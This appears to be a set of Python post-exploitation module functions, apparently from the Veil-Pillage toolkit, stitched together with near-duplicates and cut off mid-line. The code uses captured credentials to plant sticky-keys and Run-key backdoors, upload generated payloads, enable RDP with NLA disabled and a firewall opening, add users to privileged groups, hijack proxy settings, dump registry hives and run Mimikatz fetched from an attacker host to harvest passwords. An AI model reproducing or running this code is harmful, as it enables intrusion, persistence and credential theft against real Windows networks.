def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] # kill all powershell processes killCMD = "taskkill /f /im powershell.exe" for target in self.targets: # execute the command on the host and get the output out = command_methods.executeResult(target, username, password, killCMD, triggerMethod=triggerMethod) if "SUCCESS" in out: self.output += "[*] Powershell processes terminated using creds '" + username + ":" + password + "' on " + target + "\n" else: self.output += "[*] Powershell processes failed to terminate using creds '" + username + ":" + password + "' on " + target + "\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] for target in self.targets: print " [*] Doing soemthing on %s" % (target) command = "something to do on the host" # ... result = command_methods.executeResult( target, username, password, command, self.required_options["trigger_method"][0]) # check our output and write output/cleanup as appropriate if "something" in result: self.output += "action successful on " + target + "\n" # this needs to be tab-separated, check a module for examples self.cleanup += "cleanup command " + target + "\n" # finally return our putput and cleanup text return (self.output, self.cleanup)
def run(self): # assume single set of credentials (take the first one) username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: # the registry command to set up the sethc stickkeys backdoor sethcCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"C:\\Windows\\System32\\cmd.exe\"" # execute the sethc command and get the result sethcResult = command_methods.executeResult(target, username, password, sethcCommand, triggerMethod) if sethcResult == "": self.output += "[!] No result file, SETHC backdoor enable failed using creds '"+username+":"+password+"' on : " + target + "\n" elif "The operation completed successfully" in sethcResult: self.output += "[*] SETHC backdoor successfully enabled using creds '"+username+":"+password+"' on : " + target + "\n" # build our cleanup -> deleting this registry run value cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f" self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"
def run(self): # assume single set of credentials (take the first one) username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: # the registry command to set up the sethc stickkeys backdoor sethcCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"C:\\Windows\\System32\\cmd.exe\"" # execute the sethc command and get the result sethcResult = command_methods.executeResult( target, username, password, sethcCommand, triggerMethod) if sethcResult == "": self.output += "[!] No result file, SETHC backdoor enable failed using creds '" + username + ":" + password + "' on : " + target + "\n" elif "The operation completed successfully" in sethcResult: self.output += "[*] SETHC backdoor successfully enabled using creds '" + username + ":" + password + "' on : " + target + "\n" # build our cleanup -> deleting this registry run value cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f" self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: # reg.exe command to detect if powershell is installed command = "reg query HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install" result = command_methods.executeResult(target, username, password, command, triggerMethod) if result.startswith("error:"): self.output += "[!] Error '"+result+"' in detecting powershell using creds '"+username+":"+password+"' on : " + target + "\n" elif result == "": self.output += "[!] No result file, detect PowerShell failed using creds '"+username+":"+password+"' on : " + target + "\n" elif "0x1" in result: self.output += "[*] PowerShell detected using creds '"+username+":"+password+"' on : " + target + "\n" elif "0x0" in result: self.output += "[*] PowerShell not detected using creds '"+username+":"+password+"' on : " + target + "\n" else: print "result:",result self.output += "[!] Error in detecting PowerShell using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] uploadName = self.required_options["upload_name"][0] # if we're using Veil-Evasion for payload generation if self.required_options["exe_path"][0].lower() == "veil": # create a Veil-Evasion controller object for payload generation con = controller.Controller() # check various possibly flags passed by the command line # if we don't have payload specified, jump to the main controller menu if not self.args.p: payloadPath = con.MainMenu() # otherwise, set all the appropriate payload options else: # pull out any required options from the command line and # build the proper dictionary so we can set the payload manually options = {} if self.args.c: options['required_options'] = {} for option in self.args.c: name,value = option.split("=") options['required_options'][name] = [value, ""] # pull out any msfvenom shellcode specification and msfvenom options if self.args.msfpayload: options['msfvenom'] = [self.args.msfpayload, self.args.msfoptions] # manually set the payload in the controller object con.SetPayload(self.args.p, options) # generate the payload code code = con.GeneratePayload() # grab the generated payload .exe name payloadPath = con.OutputMenu(con.payload, code, showTitle=True, interactive=False) # nicely print the title and module name again (since Veil-Evasion trashes this) messages.title() print " [*] Executing module: " + helpers.color(self.name) + "..." # sanity check if the user exited Veil-Evasion execution if not payloadPath or payloadPath == "": print helpers.color(" [!] No output from Veil-Evasion", warning=True) raw_input("\n [>] Press enter to continue: ") return "" # if we have a custom-specified .exe, use that instead else: payloadPath = self.required_options["exe_path"][0] # if the .exe path doesn't exist, print and error and return if not os.path.exists(payloadPath): print helpers.color("\n\n [!] Invalid .exe path specified", warning=True) raw_input("\n [>] Press enter to continue: ") return "" # make sure the name ends with ".exe" if not uploadName.endswith(".exe"): uploadName += ".exe" # copy the resulting binary into the temporary directory with the appropriate name os.system("cp "+payloadPath+" /tmp/"+uploadName) for target in self.targets: baseName = payloadPath.split("/")[-1] # upload the payload to C:\Windows\System32\ smb.uploadFile(target, username, password, "C$", "\\Windows\\","/tmp/"+uploadName) self.output += "[*] Binary '"+baseName+"' uploaded to C:\\Windows\\"+uploadName+" using creds '"+username+":"+password+"' on : " + target + "\n" # the registry command to set up the sethc stickkeys backdoor for the binary sethcCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"C:\\Windows\\"+uploadName+"\"" # execute the sethc command and get the result sethcResult = command_methods.executeResult(target, username, password, sethcCommand, triggerMethod) if sethcResult == "": self.output += "[!] No result file, SETHC backdoor enable failed using creds '"+username+":"+password+"' on : " + target + "\n" elif "The operation completed successfully" in sethcResult: self.output += "[*] SETHC backdoor successfully enabled using creds '"+username+":"+password+"' on : " + target + "\n" # build our cleanup -> deleting this registry run value cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f" self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] lhost = self.required_options["lhost"][0] use_ssl = self.required_options["use_ssl"][0] force_method = self.required_options["force_method"][0] delay = self.required_options["delay"][0] out_file = self.required_options["out_file"][0] # let's keep track of all credentials found allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], [] for target in self.targets: powershellInstalled = False # check if we're forcing a particular grab method if force_method.lower() == "binary": powershellInstalled = False elif force_method.lower() == "powershell": powershellInstalled = True else: # check if we have a functional Powershell installation powershellCommand = 'powershell.exe -c "$a=42;$a"' powershellResult = command_methods.executeResult(target, username, password, powershellCommand, "wmis") if powershellResult.strip() == "42": powershellInstalled = True if powershellInstalled: # do powersploit combined file of invoke-mimikatz and powerdump print helpers.color("\n [*] Powershell installed on " + target) self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n" # the temporary output file we will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # path to the combined Invoke-Mimikatz/powerdump powershell script secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1" # trigger the powershell download on just this target delivery_methods.powershellHostTrigger( target, username, password, secondStagePath, lhost, "", triggerMethod="winexe", outFile=out_file, ssl=use_ssl, noArch=True, ) print "\n [*] Waiting " + delay + "s for Autograb to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # parse the powerdump component hashes = helpers.parseHashdump(out) allhashes.extend(hashes) if out != "": self.output += ( "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" ) else: self.output += ( "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" ) else: # do reg.exe for hashdump and host/execute for mimikatz print helpers.color("\n [!] Powershell not installed on " + target, warning=True) print helpers.color("\n [*] Using reg.exe save method for hash dumping on " + target) self.output += "[!] Powershell not installed on " + target + "\n" # reg.exe command to save off the hives regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y" # execute the registry save command command_methods.executeCommand(target, username, password, regSaveCommand, "wmis") print helpers.color("\n [*] Dumping hashes on " + target) # sleep for 5 seconds to let everything backup time.sleep(5) # grab all of the backed up files systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False) securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False) samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False) # more error-checking here? if systemFile == "": self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n" else: f = open("/tmp/system", "w") f.write(systemFile) f.close() if securityFile == "": self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n" else: f = open("/tmp/security", "w") f.write(securityFile) f.close() if samFile == "": self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n" else: f = open("/tmp/sam", "w") f.write(samFile) f.close() # get all the hashes from these hives out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam") # save the output file off saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out) self.output += ( "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n" ) # save these off to the universal list hashes = helpers.parseHashdump(out) allhashes.extend(hashes) # now, detect the architecture archCommand = "echo %PROCESSOR_ARCHITECTURE%" archResult = command_methods.executeResult(target, username, password, archCommand, "wmis") arch = "x86" if "64" in archResult: arch = "x64" # now time for ze mimikatz! mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe" # the temporary output file we will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file exeArgs = '"sekurlsa::logonPasswords full" "exit" >' + out_file # host mimikatz.exe and trigger it ONLY on this particular machine # so we can get the architecture correct delivery_methods.hostTrigger( target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs ) print "\n [*] Waiting " + delay + "s for Mimikatz to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out) if out != "": self.output += ( "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" ) else: self.output += ( "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" ) if len(allhashes) > 0: allhashes = sorted(set(allhashes)) self.output += "[*] All unique hashes:\n\t" + "\n\t".join(allhashes) + "\n" if len(allmsv) > 0: allmsv = sorted(set(allmsv)) self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n" if len(allkerberos) > 0: allkerberos = sorted(set(allkerberos)) self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n" if len(allwdigest) > 0: allwdigest = sorted(set(allwdigest)) self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n" if len(alltspkg) > 0: alltspkg = sorted(set(alltspkg)) self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self): # assume single set of credentials (take the first one) username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] # enable RDP command rdpCMD = 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' # cleanup RDP command rdpCleanupCMD = 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f' # Disable NLA command nlaCMD = 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f' # Firewall exception command firewallCMD = "netsh firewall set service type = remotedesktop mod = enable" for target in self.targets: # execute the RDP enable command and get the result rdpResult = command_methods.executeResult(target, username, password, rdpCMD, triggerMethod) if rdpResult == "": self.output += ( "[!] No result file, RDP enable failed using creds '" + username + ":" + password + "' on : " + target + "\n" ) elif "The operation completed successfully" in rdpResult: self.output += ( "[*] RDP successfully enabled using creds '" + username + ":" + password + "' on : " + target + "\n" ) # our cleanup is to execute the RDP disable command self.cleanup += ( "executeCommand|" + target + "|" + username + "|" + password + "|" + rdpCleanupCMD + "|" + triggerMethod + "\n" ) # if we succeed here, keep going... # execute the disable NLA command nlaResult = command_methods.executeResult(target, username, password, nlaCMD, triggerMethod) if nlaResult == "": self.output += ( "[!] No result file, NLA disable failed using creds '" + username + ":" + password + "' on : " + target + "\n" ) elif "The operation completed successfully" in nlaResult: self.output += ( "[*] NLA successfully disabled using creds '" + username + ":" + password + "' on : " + target + "\n" ) # more success, keep going again... # execute the firewall exception command firewallResult = command_methods.executeResult( target, username, password, firewallCMD, triggerMethod ) if firewallResult == "": self.output += ( "[!] No result file, firewall exeception failed using creds '" + username + ":" + password + "' on : " + target + "\n" ) elif "executed successfully" in firewallResult: self.output += ( "[*] Firewall exception successfully enabled using creds '" + username + ":" + password + "' on : " + target + "\n" ) else: self.output += ( "[!] Error in enabling firewall exception using creds '" + username + ":" + password + "' on : " + target + "\n" ) else: self.output += ( "[!] Error in disabling NLA using creds '" + username + ":" + password + "' on : " + target + "\n" ) else: self.output += ( "[!] Error in enabling RDP using creds '" + username + ":" + password + "' on : " + target + "\n" )
def run(self): # assume single set of credentials for this module username, password = self.creds[0] triggerMethod = self.required_options['trigger_method'][0] proxyUrl = self.required_options['proxy_url'][0] proxyCheckCmd = "reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable" proxyCheckServerCmd = "reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer" proxyEnableCmd = "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable /t REG_DWORD /d 1 /f" proxySetCmd = "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /t REG_SZ /d %s /f" % ( proxyUrl) proxy = "" for target in self.targets: self.output += "[*] Checking proxy settings on %s" % (target) results = command_methods.executeResult(target, username, password, proxyCheckCmd, triggerMethod) if results == "": self.output += "\n[!] No result file, Proxy enable failed using creds '" + username + ":" + password + "' on : " + target + "\n" elif "ProxyEnable" not in results: self.output += "\n[*] Proxy has never been set on " + target self.output += "\n[*] Enabling system proxy" enable_results = command_methods.executeResult( target, username, password, proxyEnableCmd, triggerMethod) if "The operation completed successfully" in enable_results: self.output += "\n[*] Proxy successfully enabled on " + target self.output += "\n[*] Setting proxy server" set_results = command_methods.executeResult( target, username, password, proxySetCmd, triggerMethod) if "The operation completed successfully" in set_results: self.output += "\n[*] Proxy address successfully set to %s on %s" % ( proxyUrl, target) cleanupCMD = "reg delete \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable /f && reg delete \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /f" self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n" elif "0x0" in results: server_results = command_methods.executeResult( target, username, password, proxyCheckServerCmd, triggerMethod) proxy = "" for res in server_results.split(" "): r = re.findall(r".+:[0-9]{1,5}", res) if r: proxy = r[0] if proxy == "": self.output += "\n[*] Proxy has been disabled on %s" % ( target) else: self.output += "\n[*] Proxy has been disabled but set to %s on %s" % ( proxy, target) self.output += "\n[*] Enabling proxy" enable_results = command_methods.executeResult( target, username, password, proxyEnableCmd, triggerMethod) if "The operation completed successfully" in enable_results: self.output += "\n[*] Proxy successfully enabled on " + target self.output += "\n[*] Setting proxy server" set_results = command_methods.executeResult( target, username, password, proxySetCmd, triggerMethod) if "The operation completed successfully" in set_results: self.output += "\n[*] Proxy address successfully set to %s on %s" % ( proxyUrl, target) cleanupCMD = "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable /t REG_DWORD /d 0 /f && reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /t REG_SZ /d \"%s\" /f" % proxy self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n" elif "0x1" in results: server_results = command_methods.executeResult( target, username, password, proxyCheckServerCmd, triggerMethod) proxy = "" for res in server_results.split(" "): r = re.findall(r".+:[0-9]{1,5}", res) if r: proxy = r[0] if proxy == "": self.output += "\n[*] Proxy already enabled on %s" % ( target) else: self.output += "\n[*] Proxy already enabled and set to %s on %s" % ( proxy, target) self.output += "\n[*] Setting proxy server on " + target set_results = command_methods.executeResult( target, username, password, proxySetCmd, triggerMethod) if "The operation completed successfully" in set_results: self.output += "\n[*] Proxy address successfully set to %s on %s" % ( proxyUrl, target) cleanupCMD = "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /t REG_SZ /d \"%s\" /f" % proxy self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n" else: self.output += "\n[!] Got unexpected output: %s" % results
def run(self): # assume single set of credentials for this module username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] proxyUrl = self.required_options["proxy_url"][0] proxyCheckCmd = ( 'reg query "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyEnable' ) proxyCheckServerCmd = ( 'reg query "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer' ) proxyEnableCmd = 'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f' proxySetCmd = ( 'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer /t REG_SZ /d %s /f' % (proxyUrl) ) proxy = "" for target in self.targets: self.output += "[*] Checking proxy settings on %s" % (target) results = command_methods.executeResult(target, username, password, proxyCheckCmd, triggerMethod) if results == "": self.output += ( "\n[!] No result file, Proxy enable failed using creds '" + username + ":" + password + "' on : " + target + "\n" ) elif "ProxyEnable" not in results: self.output += "\n[*] Proxy has never been set on " + target self.output += "\n[*] Enabling system proxy" enable_results = command_methods.executeResult( target, username, password, proxyEnableCmd, triggerMethod ) if "The operation completed successfully" in enable_results: self.output += "\n[*] Proxy successfully enabled on " + target self.output += "\n[*] Setting proxy server" set_results = command_methods.executeResult(target, username, password, proxySetCmd, triggerMethod) if "The operation completed successfully" in set_results: self.output += "\n[*] Proxy address successfully set to %s on %s" % (proxyUrl, target) cleanupCMD = 'reg delete "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyEnable /f && reg delete "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer /f' self.cleanup += ( "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n" ) elif "0x0" in results: server_results = command_methods.executeResult( target, username, password, proxyCheckServerCmd, triggerMethod ) proxy = "" for res in server_results.split(" "): r = re.findall(r".+:[0-9]{1,5}", res) if r: proxy = r[0] if proxy == "": self.output += "\n[*] Proxy has been disabled on %s" % (target) else: self.output += "\n[*] Proxy has been disabled but set to %s on %s" % (proxy, target) self.output += "\n[*] Enabling proxy" enable_results = command_methods.executeResult( target, username, password, proxyEnableCmd, triggerMethod ) if "The operation completed successfully" in enable_results: self.output += "\n[*] Proxy successfully enabled on " + target self.output += "\n[*] Setting proxy server" set_results = command_methods.executeResult(target, username, password, proxySetCmd, triggerMethod) if "The operation completed successfully" in set_results: self.output += "\n[*] Proxy address successfully set to %s on %s" % (proxyUrl, target) cleanupCMD = ( 'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f && reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer /t REG_SZ /d "%s" /f' % proxy ) self.cleanup += ( "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n" ) elif "0x1" in results: server_results = command_methods.executeResult( target, username, password, proxyCheckServerCmd, triggerMethod ) proxy = "" for res in server_results.split(" "): r = re.findall(r".+:[0-9]{1,5}", res) if r: proxy = r[0] if proxy == "": self.output += "\n[*] Proxy already enabled on %s" % (target) else: self.output += "\n[*] Proxy already enabled and set to %s on %s" % (proxy, target) self.output += "\n[*] Setting proxy server on " + target set_results = command_methods.executeResult(target, username, password, proxySetCmd, triggerMethod) if "The operation completed successfully" in set_results: self.output += "\n[*] Proxy address successfully set to %s on %s" % (proxyUrl, target) cleanupCMD = ( 'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer /t REG_SZ /d "%s" /f' % proxy ) self.cleanup += ( "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n" ) else: self.output += "\n[!] Got unexpected output: %s" % results
def run(self): # assume single set of credentials for this module username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] lhost = self.required_options["lhost"][0] delay = self.required_options["delay"][0] out_file = self.required_options["out_file"][0] # the temporary output file gpp-password will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # let's keep track of ALL plaintext credentials found allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [] for target in self.targets: print "\n [*] Executing mimikatz on " + target # first, detect the architecture archCommand = "echo %PROCESSOR_ARCHITECTURE%" archResult = command_methods.executeResult(target, username, password, archCommand, triggerMethod) # if there's a failure in this initial execution, go to the next target if "error" in archResult: self.output += "[!] Mimikatz failed for " + target + " : " + archResult + "\n" continue arch = "x86" if "64" in archResult: arch = "x64" exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file # now time for mimikatz! mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe" # host the arch-correct mimikatz.exe and trigger it with the appropriate arguments delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod=triggerMethod, exeArgs=exeArgs) print "\n [*] Waiting " + delay + "s for Mimikatz to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out) if out != "": self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" else: self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" # append the total mimikatz creds if we have any if len(allmsv) > 0: allmsv = sorted(set(allmsv)) self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n" if len(allkerberos) > 0: allkerberos = sorted(set(allkerberos)) self.output += "[*] All kerberos:\n\t" + "\n\t".join( allkerberos) + "\n" if len(allwdigest) > 0: allwdigest = sorted(set(allwdigest)) self.output += "[*] All wdigest:\n\t" + "\n\t".join( allwdigest) + "\n" if len(alltspkg) > 0: alltspkg = sorted(set(alltspkg)) self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] uploadName = self.required_options["upload_name"][0] key_name = self.required_options["key_name"][0] # if we're using Veil-Evasion for payload generation if self.required_options["exe_path"][0].lower() == "veil": # create a Veil-Evasion controller object for payload generation con = controller.Controller() # if we don't have payload specified, jump to the main controller menu if not self.args.p: payloadPath = con.MainMenu() # otherwise, set all the appropriate payload options else: # pull out any required options from the command line and # build the proper dictionary so we can set the payload manually options = {} if self.args.c: options['required_options'] = {} for option in self.args.c: name, value = option.split("=") options['required_options'][name] = [value, ""] # pull out any msfvenom shellcode specification and msfvenom options if self.args.msfpayload: options['msfvenom'] = [ self.args.msfpayload, self.args.msfoptions ] # manually set the payload in the controller object con.SetPayload(self.args.p, options) # generate the payload code code = con.GeneratePayload() # grab the generated payload .exe name payloadPath = con.OutputMenu(con.payload, code, showTitle=True, interactive=False) # nicely print the title and module name again (since Veil-Evasion trashes this) messages.title() print " [*] Executing module: " + helpers.color(self.name) + "..." # sanity check if the user exited Veil-Evasion execution if not payloadPath or payloadPath == "": print helpers.color(" [!] No output from Veil-Evasion", warning=True) raw_input("\n [>] Press enter to continue: ") return "" # if we have a custom-specified .exe, use that instead else: payloadPath = self.required_options["exe_path"][0] # if the .exe path doesn't exist, print and error and return if not os.path.exists(payloadPath): print helpers.color("\n\n [!] Invalid .exe path specified", warning=True) raw_input("\n [>] Press enter to continue: ") return "" # make sure the name ends with ".exe" if not uploadName.endswith(".exe"): uploadName += ".exe" # copy the resulting binary into the temporary directory with the appropriate name os.system("cp " + payloadPath + " /tmp/" + uploadName) for target in self.targets: baseName = payloadPath.split("/")[-1] # upload the payload to C:\Windows\System32\ smb.uploadFile(target, username, password, "C$", "\\Windows\\", "/tmp/" + uploadName) self.output += "[*] Binary '" + baseName + "' uploaded to C:\\Windows\\" + uploadName + " using creds '" + username + ":" + password + "' on : " + target + "\n" # the registry command to set up the sethc stickkeys backdoor for the binary regCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /f /v " + key_name + " /t REG_SZ /d \"C:\\Windows\\" + uploadName + "\"" # execute the sethc command and get the result sethcResult = command_methods.executeResult( target, username, password, regCommand, triggerMethod) if sethcResult == "": self.output += "[!] No result file, CurrentVersion\\Run registry command failed using creds '" + username + ":" + password + "' on : " + target + "\n" elif "The operation completed successfully" in sethcResult: self.output += "[*] CurrentVersion\\Run successfully set using creds '" + username + ":" + password + "' on : " + target + "\n" # build our cleanup -> deleting this registry run value cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v " + key_name + " /f" self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: userToAdd = self.required_options["user"][0] groupToAdd = self.required_options["localgroup"][0] # command to add the user to the specified localgroup groupAddCommand = "net localgroup " + groupToAdd + " " + userToAdd + " /add" # execute the localgroup add command and get the result groupAddResult = command_methods.executeResult(target, username, password, groupAddCommand, triggerMethod) # check all of our results as appropriate if groupAddResult == "": self.output += ( "[!] No result file, localgroup add '" + userToAdd + " to " + groupToAdd + "' failed using creds '" + username + ":" + password + "' on : " + target + "\n" ) elif "The command completed successfully" in groupAddResult: self.output += ( "[*] User '" + userToAdd + " added to " + groupToAdd + "' successfully using creds '" + username + ":" + password + "' on " + target + "\n" ) # cleanup -> delete the user from the system cleanupCMD = "net localgroup " + groupToAdd + " " + userToAdd + " /delete" self.cleanup += ( "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n" ) else: self.output += ( "[!] Localgroup add '" + userToAdd + " to " + groupToAdd + "' failed using creds '" + username + ":" + password + "' on : " + target + "\n" )
def run(self): # assume single set of credentials for this module username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] lhost = self.required_options["lhost"][0] delay = self.required_options["delay"][0] out_file = self.required_options["out_file"][0] # the temporary output file gpp-password will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # let's keep track of ALL plaintext credentials found allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [] for target in self.targets: print "\n [*] Executing mimikatz on "+target # first, detect the architecture archCommand = "echo %PROCESSOR_ARCHITECTURE%" archResult = command_methods.executeResult(target, username, password, archCommand, triggerMethod) # if there's a failure in this initial execution, go to the next target if "error" in archResult: self.output += "[!] Mimikatz failed for "+target+" : "+archResult+"\n" continue arch = "x86" if "64" in archResult: arch = "x64" exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file # now time for mimikatz! mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz"+arch+".exe" # host the arch-correct mimikatz.exe and trigger it with the 